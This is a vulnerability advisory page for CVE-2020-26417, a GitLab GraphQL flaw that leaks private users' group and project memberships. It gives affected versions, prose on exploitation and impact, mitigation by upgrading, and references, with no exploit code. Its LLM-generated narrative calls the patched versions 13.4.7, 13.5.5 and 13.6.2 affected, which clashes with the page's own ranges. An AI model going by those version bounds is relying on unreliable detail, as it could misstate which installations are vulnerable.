Unrated severityNVD Advisory· Published Dec 11, 2020· Updated Aug 4, 2024

CVE-2020-26417

Description

Information disclosure via GraphQL in GitLab CE/EE 13.1 and later exposes private group and project membership. This affects versions >=13.6 to <13.6.2, >=13.5 to <13.5.5, and >=13.1 to <13.4.7.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

GitLab CE/EE 13.1 through 13.6.1 exposes private group and project membership via unredacted GraphQL queries, leaking information users intended to keep private.

Vulnerability

An information disclosure vulnerability exists in GitLab Community Edition (CE) and Enterprise Edition (EE) versions 13.1 through 13.4.7, 13.5 through 13.5.5, and 13.6 through 13.6.2. The GraphQL API does not properly redact groupMemberships, projectMemberships, and starredProjects for users who have set their profile to private, allowing unauthenticated or low-privileged users to query this data [1].

Exploitation

An attacker with network access to the GitLab instance can craft a GraphQL query targeting user profiles. No special authentication or elevated privileges are required; the attacker simply needs to know or enumerate user IDs or usernames. The vulnerability is triggered when the GraphQL endpoint returns membership data for profiles marked as private, which should have been redacted according to the user's privacy settings [1].

Impact

Successful exploitation results in unauthorized information disclosure. The attacker learns the private group and project memberships of GitLab users, potentially revealing sensitive organizational structures or non-public collaborations. This violates the confidentiality expectation of users who have selected the private profile option. The vulnerability does not grant write access or code execution on the system [1].

Mitigation

GitLab released patches in versions 13.4.7, 13.5.5, and 13.6.2 on 2020-12-11. All installations running affected versions should upgrade immediately to the corresponding patched release. No workaround is available for unpatched instances beyond restricting network access to the GraphQL endpoint [1].

References

Private Profiles leaking certain info (#282539) · Issues · GitLab.org / GitLab · GitLab

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

GitLab Inc./CE/EEllm-fuzzy2 versions
>=13.1, <13.4.7; >=13.5, <13.5.5; >=13.6, <13.6.2+ 1 more
- (no CPE)range: >=13.1, <13.4.7; >=13.5, <13.5.5; >=13.6, <13.6.2
- (no CPE)range: >=13.6 to <13.6.2
osv-coords
pkg:bitnami/gitlab
Range: >= 13.1.0, < 13.4.7

Patches

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26417.jsonmitrex_refsource_CONFIRM
gitlab.com/gitlab-org/gitlab/-/issues/282539mitrex_refsource_MISC

News mentions

No linked articles in our index yet.

cvss	0.000
epss	0.000
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000